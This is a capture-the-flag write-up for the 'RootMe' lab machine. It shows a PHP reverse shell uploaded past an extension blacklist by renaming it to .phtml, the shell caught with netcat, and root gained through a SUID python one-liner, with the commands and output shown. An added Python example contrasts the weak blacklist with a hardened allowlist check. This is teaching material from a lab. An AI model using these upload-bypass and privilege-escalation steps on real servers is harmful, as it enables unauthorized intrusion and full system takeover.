
RootMe

BurpSuite

  • Request From: [IP:80/panel]

There is a server-side filter which prevents us from uploading specific file extensions. We can use Burp Intruder to fuzz the extension in php-reverse-shell.[EXTENSION_TO_FUZZ] and find one that is accepted.

POST /panel/ HTTP/1.1
Host: 10.10.126.254
Referer: http://10.10.126.254/panel/
Cookie: PHPSESSID=a2124oo7f1hp7un7b5hlvrn2ep

Content-Disposition: form-data; name="fileUpload"; filename="php-reverse-shell.php"
Content-Type: application/x-php

The extension php-reverse-shell.[phtml] is not blacklisted.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="../css/panel.css">
<script src=../"js/maquina_de_escrever.js"></script>
<title>HackIT - Home</title>
</head>
<body>
<div class="first">
<div class="main-div">
<form action="" method="POST" enctype="multipart/form-data">
<p>Select a file to upload:</p>
<input type="file" name="fileUpload" class="fileUpload">
<input type="submit" value="Upload" name="submit">
<p class='success'>O arquivo foi upado com sucesso!</p><a href='../uploads/php-reverse-shell.phtml'>Veja!</a> </form>
</div>
</div>
</body>
</html>

  • Translation
┌──────────────────────────────────┐    ┌──────────────────────────────────────────┐
| O arquivo foi upado com sucesso! | -► | The file has been successfully uploaded! |
└──────────────────────────────────┘    └──────────────────────────────────────────┘
  • The reverse shell was successfully uploaded to: [IP:80/uploads]
   [ICO]        Name                      Last modified      Size  Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   [PARENTDIR]  Parent Directory                             -
   [   ]        php-reverse-shell.phtml   2022-10-07 07:47   5.4K
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
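As an added illustration (not code from the original writeup or from the target panel), the kind of blacklist check that lets a .phtml file through, beside an allowlist check that would have rejected it. The blacklist contents, the allowed extensions and the sample file names are constructed assumptions for the example.

```python
import os
import re

# Constructed blacklist in the style of the panel's filter: it rejects a few
# well-known PHP extensions, so anything not listed (such as .phtml) passes.
BLACKLISTED_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phps"}


def blacklist_allows(filename: str) -> bool:
    """Weak check: accepts every extension that is not explicitly blacklisted."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLISTED_EXTENSIONS


# Hardened form: only the extensions the feature actually needs, a file name
# with exactly one dot (so "x.png.phtml" and "x.phtml.png" are both rejected),
# and a header check so the content matches the claimed type.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def allowlist_allows(filename: str, content: bytes) -> bool:
    """Hardened check: allowlisted single extension plus matching file header."""
    base = os.path.basename(filename)  # drop any directory components
    if not SAFE_NAME.fullmatch(base):
        return False
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return content.startswith(MAGIC[ext])


if __name__ == "__main__":
    png_header = b"\x89PNG\r\n\x1a\n"
    for name, data in [("php-reverse-shell.php", b"<?php"),
                       ("php-reverse-shell.phtml", b"<?php"),
                       ("photo.png", png_header),
                       ("photo.png.phtml", png_header)]:
        print(f"{name:28} blacklist={blacklist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name, data)}")
```

Even with the allowlist, uploads should land in a directory where the web server does not execute scripts, since the listing above shows the uploaded file being served straight from /uploads.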


Privilege Escalation

  • We can catch the reverse shell using netcat.
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The /usr/bin/python binary has the SUID bit set.
www-data@rootme /$ find / -type f -perm -04000 -ls 2>/dev/null
...
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
...

  • Using the SUID Python binary to escalate privileges.
www-data@rootme /$ /usr/bin/python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
www-data@rootme /$ id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@rootme /$ whoami
root